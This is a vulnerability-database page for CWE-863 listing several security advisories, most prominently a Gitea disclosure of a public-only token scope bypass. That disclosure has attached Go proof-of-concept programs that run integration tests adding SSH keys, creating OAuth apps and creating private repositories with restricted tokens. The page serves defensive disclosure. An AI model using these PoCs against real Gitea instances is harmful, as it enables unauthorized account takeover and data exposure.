CWE-863
Allowed-with-ReviewIncorrect Authorization
Abstraction: Class · Status: Incomplete
The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.
5504 vulnerabilities reference this CWE, most recent first.
GHSA-WR6V-9F75-VH2G
Vulnerability from github – Published: 2024-01-31 22:43 – Updated: 2024-05-20 22:06Impact
In addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special security.insecure entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request.
Patches
The issue has been fixed in v0.12.5 .
Workarounds
Avoid using BuildKit frontends from untrusted sources. A frontend image is usually specified as the #syntax line on your Dockerfile, or with --frontend flag when using buildctl build command.
References
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/moby/buildkit"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.12.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-23653"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-31T22:43:20Z",
"nvd_published_at": "2024-01-31T22:15:54Z",
"severity": "CRITICAL"
},
"details": "### Impact\nIn addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request.\n\n### Patches\nThe issue has been fixed in v0.12.5 .\n\n### Workarounds\nAvoid using BuildKit frontends from untrusted sources. A frontend image is usually specified as the `#syntax` line on your Dockerfile, or with `--frontend` flag when using `buildctl build` command.\n\n### References\n\n",
"id": "GHSA-wr6v-9f75-vh2g",
"modified": "2024-05-20T22:06:06Z",
"published": "2024-01-31T22:43:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23653"
},
{
"type": "WEB",
"url": "https://github.com/moby/buildkit/pull/4602"
},
{
"type": "WEB",
"url": "https://github.com/moby/buildkit/commit/5026d95aa3336e97cfe46e3764f52d08bac7a10e"
},
{
"type": "WEB",
"url": "https://github.com/moby/buildkit/commit/92cc595cfb12891d4b3ae476e067c74250e4b71e"
},
{
"type": "PACKAGE",
"url": "https://github.com/moby/buildkit"
},
{
"type": "WEB",
"url": "https://github.com/moby/buildkit/releases/tag/v0.12.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Buildkit\u0027s interactive containers API does not validate entitlements check"
}
GHSA-WRF8-W7Q7-MFR4
Vulnerability from github – Published: 2022-02-12 00:00 – Updated: 2023-06-23 21:30An Improper access control vulnerability in StBedtimeModeReceiver in Wear OS 3.0 prior to Firmware update Feb-2022 Release allows untrusted applications to change bedtime mode without a proper permission.
{
"affected": [],
"aliases": [
"CVE-2022-23994"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-02-11T18:15:00Z",
"severity": "MODERATE"
},
"details": "An Improper access control vulnerability in StBedtimeModeReceiver in Wear OS 3.0 prior to Firmware update Feb-2022 Release allows untrusted applications to change bedtime mode without a proper permission.",
"id": "GHSA-wrf8-w7q7-mfr4",
"modified": "2023-06-23T21:30:26Z",
"published": "2022-02-12T00:00:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23994"
},
{
"type": "WEB",
"url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2022\u0026month=2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WRFV-Q4V6-CW3X
Vulnerability from github – Published: 2024-08-07 09:31 – Updated: 2024-10-11 15:30CloudStack account-users by default use username and password based authentication for API and UI access. Account-users can generate and register randomised API and secret keys and use them for the purpose of API-based automation and integrations. Due to an access permission validation issue that affects Apache CloudStack versions 4.10.0 up to 4.19.1.0, domain admin accounts were found to be able to query all registered account-users API and secret keys in an environment, including that of a root admin. An attacker who has domain admin access can exploit this to gain root admin and other-account privileges and perform malicious operations that can result in compromise of resources integrity and confidentiality, data loss, denial of service and availability of CloudStack managed infrastructure.
Users are recommended to upgrade to Apache CloudStack 4.18.2.3 or 4.19.1.1, or later, which addresses this issue. Additionally, all account-user API and secret keys should be regenerated.
{
"affected": [],
"aliases": [
"CVE-2024-42062"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-276",
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-07T08:16:12Z",
"severity": "HIGH"
},
"details": "CloudStack account-users by default use username and password based authentication for API and UI access. Account-users can\u00a0generate and register randomised API and secret keys and use them for the purpose of API-based automation and integrations.\u00a0Due to an access permission validation issue that affects Apache CloudStack versions 4.10.0 up to 4.19.1.0, domain admin accounts were found to be able to query all registered account-users API and secret keys in an environment, including that of a root admin.\u00a0An attacker who has domain admin access can exploit this to gain root admin and other-account privileges and perform malicious operations that can result in compromise of resources integrity and confidentiality, data loss,\u00a0denial of service\u00a0and availability of CloudStack managed infrastructure.\n\nUsers are recommended to upgrade to Apache CloudStack 4.18.2.3 or 4.19.1.1, or later, which addresses this issue.\u00a0Additionally, all account-user API and secret keys should be regenerated.",
"id": "GHSA-wrfv-q4v6-cw3x",
"modified": "2024-10-11T15:30:32Z",
"published": "2024-08-07T09:31:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42062"
},
{
"type": "WEB",
"url": "https://cloudstack.apache.org/blog/security-release-advisory-4.19.1.1-4.18.2.3"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/lxqtfd6407prbw3801hb4fz3ot3t8wlj"
},
{
"type": "WEB",
"url": "https://www.shapeblue.com/shapeblue-security-advisory-apache-cloudstack-security-releases-4-18-2-3-and-4-19-1-1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WRQ8-FCV5-8HVP
Vulnerability from github – Published: 2026-07-06 20:58 – Updated: 2026-07-06 20:58Summary
The tailnet coordinator validates that an agent's Addresses derive from its authenticated UUID but applies no equivalent check to AllowedIPs. The coordinator forwards agent-supplied AllowedIPs verbatim to tunnel peers which install them into the WireGuard peer configuration.
Impact
A malicious workspace agent can advertise arbitrary AllowedIPs prefixes including another agent's tailnet address. Coder's ServerTailnet routes to agents by tailnet IP so an agent that claims a victim's prefix can intercept web terminal and workspace app traffic and serve spoofed content. Exploitation requires an authenticated user with a running workspace and a modified agent binary.
Patches
The fix validates each AllowedIPs prefix against the authenticating agent's UUID just like Addresses.
The fix was backported to all supported release lines:
| Release line | Patched version |
|---|---|
| 2.34 | v2.34.2 |
| 2.33 | v2.33.8 |
| 2.32 | v2.32.7 |
| 2.29 (ESR) | v2.29.17 |
Workarounds
Operators who cannot upgrade immediately should monitor coordinator logs for agents advertising unexpected AllowedIPs prefixes.
Resources
- Fix: #26144
Credits
Coder would like to thank Anthropic's Security Team (ANT-2026-22451) for independently disclosing this issue!
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coder/coder/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.34.0"
},
{
"fixed": "2.34.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/coder/coder/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.33.0"
},
{
"fixed": "2.33.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/coder/coder/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.30.0"
},
{
"fixed": "2.32.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/coder/coder/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.29.17"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-55428"
],
"database_specific": {
"cwe_ids": [
"CWE-285",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-06T20:58:30Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe tailnet coordinator validates that an agent\u0027s `Addresses` derive from its authenticated UUID but applies no equivalent check to `AllowedIPs`. The coordinator forwards agent-supplied `AllowedIPs` verbatim to tunnel peers which install them into the WireGuard peer configuration.\n\n### Impact\n\nA malicious workspace agent can advertise arbitrary `AllowedIPs` prefixes including another agent\u0027s tailnet address. Coder\u0027s `ServerTailnet` routes to agents by tailnet IP so an agent that claims a victim\u0027s prefix can intercept web terminal and workspace app traffic and serve spoofed content. Exploitation requires an authenticated user with a running workspace and a modified agent binary.\n\n### Patches\n\nThe fix validates each `AllowedIPs` prefix against the authenticating agent\u0027s UUID just like `Addresses`.\n\nThe fix was backported to all supported release lines:\n\n| Release line | Patched version |\n|---|---|\n| 2.34 | [v2.34.2](https://github.com/coder/coder/releases/tag/v2.34.2) |\n| 2.33 | [v2.33.8](https://github.com/coder/coder/releases/tag/v2.33.8) |\n| 2.32 | [v2.32.7](https://github.com/coder/coder/releases/tag/v2.32.7) |\n| 2.29 (ESR) | [v2.29.17](https://github.com/coder/coder/releases/tag/v2.29.17) |\n\n### Workarounds\n\nOperators who cannot upgrade immediately should monitor coordinator logs for agents advertising unexpected `AllowedIPs` prefixes.\n\n### Resources\n\n- Fix: #26144\n\n### Credits\n\nCoder would like to thank Anthropic\u0027s Security Team (ANT-2026-22451) for independently disclosing this issue!",
"id": "GHSA-wrq8-fcv5-8hvp",
"modified": "2026-07-06T20:58:30Z",
"published": "2026-07-06T20:58:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coder/coder/security/advisories/GHSA-wrq8-fcv5-8hvp"
},
{
"type": "WEB",
"url": "https://github.com/coder/coder/pull/26144"
},
{
"type": "PACKAGE",
"url": "https://github.com/coder/coder"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Coder: Route hijacking through lack of validation of agent-supplied AllowedIPs in tailnet coordinator"
}
GHSA-WRQC-Q8P5-76M5
Vulnerability from github – Published: 2022-05-13 01:48 – Updated: 2022-11-01 22:47An improper authorization vulnerability exists in Jenkins Gerrit Trigger Plugin 2.27.4 and earlier in GerritManagement.java, GerritServer.java, and PluginImpl.java that allows an attacker with Overall/Read access to retrieve some configuration information about Gerrit in Jenkins.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.sonyericsson.hudson.plugins.gerrit:gerrit-trigger"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.27.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-1000105"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2022-11-01T22:47:03Z",
"nvd_published_at": "2018-03-13T13:29:00Z",
"severity": "MODERATE"
},
"details": "An improper authorization vulnerability exists in Jenkins Gerrit Trigger Plugin 2.27.4 and earlier in GerritManagement.java, GerritServer.java, and PluginImpl.java that allows an attacker with Overall/Read access to retrieve some configuration information about Gerrit in Jenkins.",
"id": "GHSA-wrqc-q8p5-76m5",
"modified": "2022-11-01T22:47:03Z",
"published": "2022-05-13T01:48:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000105"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/gerrit-trigger-plugin/commit/a222f2d9d1bca3422e6a462a7f587ae325455b80"
},
{
"type": "WEB",
"url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-402"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Incorrect Authorization in Jenkins Gerrit Trigger Plugin"
}
GHSA-WRR5-99H5-GQ57
Vulnerability from github – Published: 2026-06-17 18:09 – Updated: 2026-06-17 18:09Summary
Many authenticated self routes under /api/v1/user/... do not enforce the public-only token restriction. As a result, a token or OAuth grant marked public-only, but otherwise carrying the route-required read/write scope category, can access or modify private account resources through self routes.
The canonical private-user endpoint correctly rejects the same tokens, for example GET /api/v1/users/{privateUser} returns 403. The bypass exists because the generic /api/v1/user route group requires user scope and reqToken(), but does not enforce the token's public-only restriction for most self routes.
This is a systemic token/OAuth scope-boundary bypass, not a single endpoint bug.
This appears related to the previously fixed public-only token issue tracked as CVE-2025-68941 / GHSA-xfq3-qj7j-4565, which affected Gitea < 1.22.3. The behavior described here reproduces on tested main checkout 6a2706626904. A representative SSH-key self-route PoC also reproduces on tested releases through v1.26.1. In other words, this should be treated as an incomplete fix / residual gap in a different route family, not as a duplicate of the older advisory.
Affected Code
The generic /api/v1/user group is mounted with user scope and reqToken():
routers/api/v1/api.go:1008-1128
tokenRequiresScopes() sets ctx.PublicOnly when the token contains public-only, but the public-only restriction is enforced only by routes that also call checkTokenPublicOnly():
routers/api/v1/api.go:241-294implementscheckTokenPublicOnly().routers/api/v1/api.go:299-341setsctx.PublicOnlyfrom the token scope.
Representative affected routes in that group:
/api/v1/user: private self profile and settings./api/v1/user/emails: read, add, and delete account email addresses./api/v1/user/keys: list and add SSH public keys./api/v1/user/applications/oauth2: list and create OAuth2 applications, including returned client secrets./api/v1/user/actions/secrets/{secretname}: create or delete user-level Actions secrets./api/v1/user/actions/variables: list, read, create, update, and delete user-level Actions variables./api/v1/user/actions/runners/...: list, update, delete runners, and mint registration tokens./api/v1/user/actions/runsand/api/v1/user/actions/jobs: list workflow metadata for private repositories./api/v1/user/repos: create private repositories and list private repositories./api/v1/user/subscriptions,/api/v1/user/times,/api/v1/user/stopwatches,/api/v1/user/teams,/api/v1/user/hooks: leak or modify private-account resources.
Correct public-only enforcement for comparison:
routers/api/v1/api.go:970-1008appliescontext.UserAssignmentAPI()andcheckTokenPublicOnly()to canonical/api/v1/users/{username}routes.routers/api/v1/user/user.go:122-125rejects public-only access to private users on/api/v1/users/{username}.routers/api/v1/api.go:1091-1092shows that/api/v1/user/reposrequires the additional repository scope category, but still does not applycheckTokenPublicOnly().
Local PoCs
The following dynamic PoCs were retested on checkout 6a2706626904 and all reproduced successfully. Each PoC writes a temporary integration test, runs it, and removes it afterward.
cd pocs
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_self_user_private_profile_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_ssh_key_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_emails_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_oauth_app_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_repos_private_repo_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_actions_secret_variable_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_runner_registration_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_runner_manage_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_webhook_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_actions_runs_private_repo_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_actions_jobs_private_repo_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_subscriptions_private_repo_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_times_private_repo_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_stopwatches_private_repo_bypass_dynamic_poc.go
GITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_teams_private_org_bypass_dynamic_poc.go
Reproduced Impact Examples
Using private fixture user user31, public-only tokens are rejected by GET /api/v1/users/user31, but tokens with the route-required scopes can still reach the self routes below.
Confirmed with public-only,write:user:
- add SSH keys through
/api/v1/user/keys; - add account emails through
/api/v1/user/emails; - create OAuth2 applications and receive
client_secretthrough/api/v1/user/applications/oauth2; - create/delete user-level Actions secrets;
- create/read/list/update/delete user-level Actions variables;
- mint user-level runner registration tokens;
- manage user-level runners;
- create user webhooks.
Confirmed with public-only,read:user:
- read private self profile/settings and account email surfaces;
- list OAuth2 applications and user webhooks;
- list private repository workflow runs/jobs exposed through self Actions routes;
- list private subscriptions, tracked times, stopwatches, and team memberships.
Confirmed with public-only plus the route-required repository category:
- create private repositories through
POST /api/v1/user/reposwithpublic-only,write:user,write:repository; - list those private repositories through
GET /api/v1/user/reposwithpublic-only,read:user,read:repository, while the canonical private repository endpoint remains forbidden.
Impact
The public-only token flag is intended to limit a token or OAuth grant to public resources. These routes violate that boundary for private accounts.
Practical abuse scenarios include:
- a third-party app or leaked token with the route-required write scope, but restricted to public resources, adding SSH credentials or OAuth applications to a private account;
- a public-resource-restricted token with the route-required write scope modifying Actions secrets/variables or registering/managing runners;
- a token limited to public resources creating and enumerating private repositories;
- a supposedly public-only integration learning private repository, workflow, team, timing, subscription, webhook, and email metadata.
Suggested Fix
Apply public-only enforcement consistently to self routes under /api/v1/user.
At minimum:
- for self routes, treat
ctx.Doeras the target user/resource owner when enforcingpublic-only; mechanically addingcheckTokenPublicOnly()is not sufficient unlessctx.ContextUseris set toctx.Doeror the check explicitly handles self routes; - reject
ctx.PublicOnlyon credential, identity, OAuth application, repository creation, webhook, Actions, runner, and email-management self-route mutations; - filter list routes so public-only tokens cannot return private repositories, private organization/team metadata, private workflow runs/jobs, private tracked time, private stopwatches, or hidden subscriptions;
- add regression coverage that compares each affected
/api/v1/user/...route against the canonical private-user or private-repository endpoint.
Non-public-only tokens should preserve current behavior.
Attachment: api_public_only_user_ssh_key_bypass_dynamic_poc.go
package main
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
)
const testSource = `// PoC test for private security report.
// SPDX-License-Identifier: MIT
package integration
import (
"net/http"
"testing"
asymkey_model "code.gitea.io/gitea/models/asymkey"
auth_model "code.gitea.io/gitea/models/auth"
"code.gitea.io/gitea/models/unittest"
user_model "code.gitea.io/gitea/models/user"
api "code.gitea.io/gitea/modules/structs"
"code.gitea.io/gitea/tests"
"github.com/stretchr/testify/require"
)
func TestAPIPublicOnlyUserSSHKeyBypass(t *testing.T) {
defer tests.PrepareTestEnv(t)()
privateUser := unittest.AssertExistsAndLoadBean(t, &user_model.User{Name: "user31"})
require.True(t, privateUser.Visibility.IsPrivate())
session := loginUser(t, privateUser.Name)
publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopePublicOnly, auth_model.AccessTokenScopeWriteUser)
MakeRequest(t, NewRequest(t, "GET", "/api/v1/users/user31").AddTokenAuth(publicOnlyWriteUserToken), http.StatusForbidden)
req := NewRequestWithJSON(t, "POST", "/api/v1/user/keys", api.CreateKeyOption{
Title: "public-only-private-key-bypass",
Key: "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4cn+iXnA4KvcQYSV88vGn0Yi91vG47t1P7okprVmhNTkipNRIHWr6WdCO4VDr/cvsRkuVJAsLO2enwjGWWueOO6BodiBgyAOZ/5t5nJNMCNuLGT5UIo/RI1b0WRQwxEZTRjt6mFNw6lH14wRd8ulsr9toSWBPMOGWoYs1PDeDL0JuTjL+tr1SZi/EyxCngpYszKdXllJEHyI79KQgeD0Vt3pTrkbNVTOEcCNqZePSVmUH8X8Vhugz3bnE0/iE9Pb5fkWO9c4AnM1FgI/8Bvp27Fw2ShryIXuR6kKvUqhVMTuOSDHwu6A8jLE5Owt3GAYugDpDYuwTVNGrHLXKpPzrGGPE/jPmaLCMZcsdkec95dYeU3zKODEm8UQZFhmJmDeWVJ36nGrGZHL4J5aTTaeFUJmmXDaJYiJ+K2/ioKgXqnXvltu0A9R8/LGy4nrTJRr4JMLuJFoUXvGm1gXQ70w2LSpk6yl71RNC0hCtsBe8BP8IhYCM0EP5jh7eCMQZNvM= nocomment",
}).AddTokenAuth(publicOnlyWriteUserToken)
resp := MakeRequest(t, req, http.StatusCreated)
key := DecodeJSON(t, resp, &api.PublicKey{})
require.Equal(t, "public-only-private-key-bypass", key.Title)
unittest.AssertExistsAndLoadBean(t, &asymkey_model.PublicKey{
ID: key.ID,
OwnerID: privateUser.ID,
Name: "public-only-private-key-bypass",
})
req = NewRequest(t, "GET", "/api/v1/user/keys").AddTokenAuth(publicOnlyWriteUserToken)
resp = MakeRequest(t, req, http.StatusOK)
keys := DecodeJSON(t, resp, []api.PublicKey{})
found := false
for _, k := range keys {
if k.ID == key.ID {
found = true
break
}
}
require.True(t, found)
}
`
func repoPath() string {
candidates := []string{}
if repo := os.Getenv("GITEA_REPO"); repo != "" {
candidates = append(candidates, repo)
}
candidates = append(candidates, "../repo", "../../gitea/repo", "../../gitea")
for _, candidate := range candidates {
if _, err := os.Stat(filepath.Join(candidate, "routers/api/v1/user/key.go")); err == nil {
return filepath.Clean(candidate)
}
}
fmt.Fprintf(os.Stderr, "could not locate Gitea checkout; tried: %s\n", strings.Join(candidates, ", "))
os.Exit(2)
return ""
}
func main() {
repo := repoPath()
testPath := filepath.Join(repo, "tests/integration/api_public_only_user_ssh_key_bypass_dynamic_poc_test.go")
if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {
fmt.Fprintf(os.Stderr, "write temp test: %v\n", err)
os.Exit(2)
}
defer func() {
if err := os.Remove(testPath); err != nil && !os.IsNotExist(err) {
fmt.Fprintf(os.Stderr, "warning: remove temp test: %v\n", err)
}
}()
cmd := exec.Command("go", "test", "-timeout", "40m", "-run", "TestAPIPublicOnlyUserSSHKeyBypass", "code.gitea.io/gitea/tests/integration")
cmd.Dir = repo
cmd.Env = append(os.Environ(), "SNAP=1", "SNAP_NAME=gitea-test", "GOTOOLCHAIN=auto")
out, err := cmd.CombinedOutput()
fmt.Printf("source=%s\n", repo)
fmt.Print(string(out))
if err != nil {
fmt.Fprintf(os.Stderr, "not reproduced: go test failed: %v\n", err)
os.Exit(1)
}
fmt.Println("reproduced: public-only,write:user is rejected on the canonical private /users/{username} endpoint")
fmt.Println("reproduced: the same public-only token with the route-required write:user scope can add an SSH public key to the private account through /api/v1/user/keys")
fmt.Println("reproduced: the same token can list that newly added key through /api/v1/user/keys")
fmt.Println("condition=private user issues a public-only,write:user token")
fmt.Println("cvss_candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N")
}
Attachment: api_public_only_user_oauth_app_bypass_dynamic_poc.go
package main
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
)
const testSource = `// PoC test for private security report.
// SPDX-License-Identifier: MIT
package integration
import (
"net/http"
"testing"
auth_model "code.gitea.io/gitea/models/auth"
"code.gitea.io/gitea/models/unittest"
user_model "code.gitea.io/gitea/models/user"
api "code.gitea.io/gitea/modules/structs"
"code.gitea.io/gitea/tests"
"github.com/stretchr/testify/require"
)
func TestAPIPublicOnlyUserOAuthAppBypass(t *testing.T) {
defer tests.PrepareTestEnv(t)()
privateUser := unittest.AssertExistsAndLoadBean(t, &user_model.User{Name: "user31"})
require.True(t, privateUser.Visibility.IsPrivate())
session := loginUser(t, privateUser.Name)
publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopePublicOnly, auth_model.AccessTokenScopeWriteUser)
publicOnlyReadUserToken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopePublicOnly, auth_model.AccessTokenScopeReadUser)
MakeRequest(t, NewRequest(t, "GET", "/api/v1/users/user31").AddTokenAuth(publicOnlyReadUserToken), http.StatusForbidden)
req := NewRequestWithJSON(t, "POST", "/api/v1/user/applications/oauth2", &api.CreateOAuth2ApplicationOptions{
Name: "public-only-private-oauth-app",
RedirectURIs: []string{"https://example.com/callback"},
ConfidentialClient: true,
}).AddTokenAuth(publicOnlyWriteUserToken)
resp := MakeRequest(t, req, http.StatusCreated)
app := DecodeJSON(t, resp, &api.OAuth2Application{})
require.Equal(t, "public-only-private-oauth-app", app.Name)
require.NotEmpty(t, app.ClientID)
require.NotEmpty(t, app.ClientSecret)
req = NewRequest(t, "GET", "/api/v1/user/applications/oauth2").AddTokenAuth(publicOnlyReadUserToken)
resp = MakeRequest(t, req, http.StatusOK)
apps := DecodeJSON(t, resp, api.OAuth2ApplicationList{})
found := false
for _, a := range apps {
if a.ID == app.ID && a.Name == app.Name {
found = true
break
}
}
require.True(t, found)
}
`
func repoPath() string {
candidates := []string{}
if repo := os.Getenv("GITEA_REPO"); repo != "" {
candidates = append(candidates, repo)
}
candidates = append(candidates, "../repo", "../../gitea/repo", "../../gitea")
for _, candidate := range candidates {
if _, err := os.Stat(filepath.Join(candidate, "routers/api/v1/user/app.go")); err == nil {
return filepath.Clean(candidate)
}
}
fmt.Fprintf(os.Stderr, "could not locate Gitea checkout; tried: %s\n", strings.Join(candidates, ", "))
os.Exit(2)
return ""
}
func main() {
repo := repoPath()
testPath := filepath.Join(repo, "tests/integration/api_public_only_user_oauth_app_bypass_dynamic_poc_test.go")
if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {
fmt.Fprintf(os.Stderr, "write temp test: %v\n", err)
os.Exit(2)
}
defer func() {
if err := os.Remove(testPath); err != nil && !os.IsNotExist(err) {
fmt.Fprintf(os.Stderr, "warning: remove temp test: %v\n", err)
}
}()
cmd := exec.Command("go", "test", "-timeout", "40m", "-run", "TestAPIPublicOnlyUserOAuthAppBypass", "code.gitea.io/gitea/tests/integration")
cmd.Dir = repo
cmd.Env = append(os.Environ(), "SNAP=1", "SNAP_NAME=gitea-test", "GOTOOLCHAIN=auto")
out, err := cmd.CombinedOutput()
fmt.Printf("source=%s\n", repo)
fmt.Print(string(out))
if err != nil {
fmt.Fprintf(os.Stderr, "not reproduced: go test failed: %v\n", err)
os.Exit(1)
}
fmt.Println("reproduced: public-only user-scoped tokens are rejected on the canonical private /users/{username} endpoint")
fmt.Println("reproduced: public-only,write:user can create an OAuth2 application for the private account and receives a client secret")
fmt.Println("reproduced: public-only,read:user can list that OAuth2 application through /api/v1/user/applications/oauth2")
fmt.Println("condition=private user issues public-only tokens with route-required user scopes")
fmt.Println("cvss_candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N")
}
Attachment: api_public_only_user_repos_private_repo_bypass_dynamic_poc.go
package main
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
)
const testSource = `// PoC test for private security report.
// SPDX-License-Identifier: MIT
package integration
import (
"net/http"
"testing"
auth_model "code.gitea.io/gitea/models/auth"
"code.gitea.io/gitea/models/unittest"
user_model "code.gitea.io/gitea/models/user"
api "code.gitea.io/gitea/modules/structs"
"code.gitea.io/gitea/tests"
"github.com/stretchr/testify/require"
)
func TestAPIPublicOnlyUserReposBypass(t *testing.T) {
defer tests.PrepareTestEnv(t)()
privateUser := unittest.AssertExistsAndLoadBean(t, &user_model.User{Name: "user31"})
require.True(t, privateUser.Visibility.IsPrivate())
session := loginUser(t, privateUser.Name)
publicOnlyReadRepoToken := getTokenForLoggedInUser(t, session,
auth_model.AccessTokenScopePublicOnly,
auth_model.AccessTokenScopeReadUser,
auth_model.AccessTokenScopeReadRepository,
)
publicOnlyWriteRepoToken := getTokenForLoggedInUser(t, session,
auth_model.AccessTokenScopePublicOnly,
auth_model.AccessTokenScopeWriteUser,
auth_model.AccessTokenScopeWriteRepository,
)
req := NewRequestWithJSON(t, "POST", "/api/v1/user/repos", &api.CreateRepoOption{
Name: "public-only-private-repo",
Private: true,
}).AddTokenAuth(publicOnlyWriteRepoToken)
resp := MakeRequest(t, req, http.StatusCreated)
created := DecodeJSON(t, resp, &api.Repository{})
require.Equal(t, "user31/public-only-private-repo", created.FullName)
require.True(t, created.Private)
MakeRequest(t, NewRequest(t, "GET", "/api/v1/repos/user31/public-only-private-repo").AddTokenAuth(publicOnlyReadRepoToken), http.StatusForbidden)
resp = MakeRequest(t, NewRequest(t, "GET", "/api/v1/user/repos").AddTokenAuth(publicOnlyReadRepoToken), http.StatusOK)
repos := DecodeJSON(t, resp, []api.Repository{})
found := false
for _, repo := range repos {
if repo.FullName == "user31/public-only-private-repo" {
found = true
require.True(t, repo.Private)
}
}
require.True(t, found)
}
`
func repoPath() string {
candidates := []string{}
if repo := os.Getenv("GITEA_REPO"); repo != "" {
candidates = append(candidates, repo)
}
candidates = append(candidates, "../repo", "../../gitea/repo", "../../gitea")
